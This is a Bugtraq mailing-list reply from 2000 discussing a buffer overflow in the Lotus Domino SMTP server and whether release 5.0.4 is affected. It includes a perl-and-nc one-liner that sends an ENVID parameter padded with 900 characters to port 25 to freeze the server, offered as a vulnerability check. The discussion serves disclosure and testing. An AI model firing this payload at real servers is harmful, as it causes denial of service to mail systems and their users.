Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: [SAFER] Buffer overflow in Lotus Domino SMTP Server
From: Fyodor <fygrave () SCORPIONS NET>
Date: Mon, 6 Nov 2000 03:27:40 -0500

However, Lotus Notes/Domino Release 5.0.4 QMR fix list indicates that
the problem was already fixed in 5.04.

See
http://www.support.lotus.com/sims2.nsf/802ee480bdd32d0b852566fa005acf8d/191a4daad1890947852569580069a59d?OpenDocument&Highlight=2,ENVID

and click on
Mail Server - Router - SMTP

The SPR# is CDOY4GFP35

Are you sure 5.04 is affected?  Or the technote is lying?


Well, at least eval. version for linux platform is vulnerable.
if you want to be confident whether it affects your server or not
 here's a small hint to play around : :-)

perl -e 'print "ehlo foo\nmail from:blah () yahoo com\nrcpt to:admin () localhost  ENVID=", "A"x900;' | nc lotus.box 25

or something like that.. :)
if all your lotus services get frozen afterwards, you are vulnerable.


-Fyodor


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault